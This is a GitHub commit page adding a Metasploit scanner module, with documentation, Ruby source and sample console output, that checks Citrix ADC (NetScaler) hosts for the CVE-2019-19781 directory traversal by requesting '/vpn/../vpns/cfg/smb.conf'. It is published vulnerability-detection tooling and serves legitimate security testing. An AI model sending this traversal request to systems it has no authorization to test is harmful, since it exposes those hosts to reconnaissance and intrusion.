Skip to content
Permalink
Browse files

Land #12813, Citrix CVE-2019-19781 scanner

  • Loading branch information
wvu-r7 committed Jan 14, 2020
2 parents b235f26 + 99235c7 commit 6498a7c231b3d85bd42d3ba7d25dca7888881625
@@ -0,0 +1,57 @@
## Introduction

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.

Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.

This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.

## Verification Steps

1. Install the module as usual
2. Start msfconsole
3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
4. Do: `set RHOSTS [IP]`
5. Do: `run`

## Options

1. `Proxies`. This option is not set by default.
2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
3. `SSL`. The default setting is `false`.
4. `THREADS`. The default setting is `1`.
5. `VHOST`. This option is not set by default.
6. `TARGETURI`. This option is the base path. `/` by default.
7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.

## Scenarios

```
msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
Module options (auxiliary/scanner/http/citrix_dir_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH /vpn/../vpns/cfg/smb.conf yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
```

## References

1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
2. <https://support.citrix.com/article/CTX267027>
@@ -0,0 +1,85 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',
'Description' => %{
This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC
(NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request
/vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of
a "[global]" directive in smb.conf, which this file should always contain.
},
'Author' => [
'Erik Wynter', # @wyntererik
'altonjx' # @altjx
],
'References' => [
['CVE', '2019-19781'],
['URL', 'https://support.citrix.com/article/CTX267027/']
],
'DisclosureDate' => '2019-12-17',
'License' => MSF_LICENSE,
'Notes' => {
'AKA' => ['Shitrix']
}
))

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])
])
end

def run_host(target_host)
turi = normalize_uri(target_uri.path, datastore['PATH'])

res = send_request_raw(
'method' => 'GET',
'uri' => turi
)

unless res
print_error("#{full_uri(turi)} - No response, target seems down.")

return Exploit::CheckCode::Unknown
end

unless res.code == 200
print_error("#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.")
vprint_error("Obtained HTTP response code #{res.code} for #{full_uri(turi)}.")

return Exploit::CheckCode::Safe
end

case turi
when /smb\.conf$/
unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.include?('[global]')
vprint_warning("#{turi} does not contain \"[global]\" directive.")
end
end

print_good("#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.")
msg = "Obtained HTTP response code #{res.code} for #{full_uri(turi)}. " \
"This means that access to #{turi} was obtained via directory traversal."
vprint_good(msg)

report_vuln(
host: target_host,
name: name,
refs: references,
info: msg
)

Exploit::CheckCode::Vulnerable
end

end

0 comments on commit 6498a7c

Please sign in to comment.
You can’t perform that action at this time.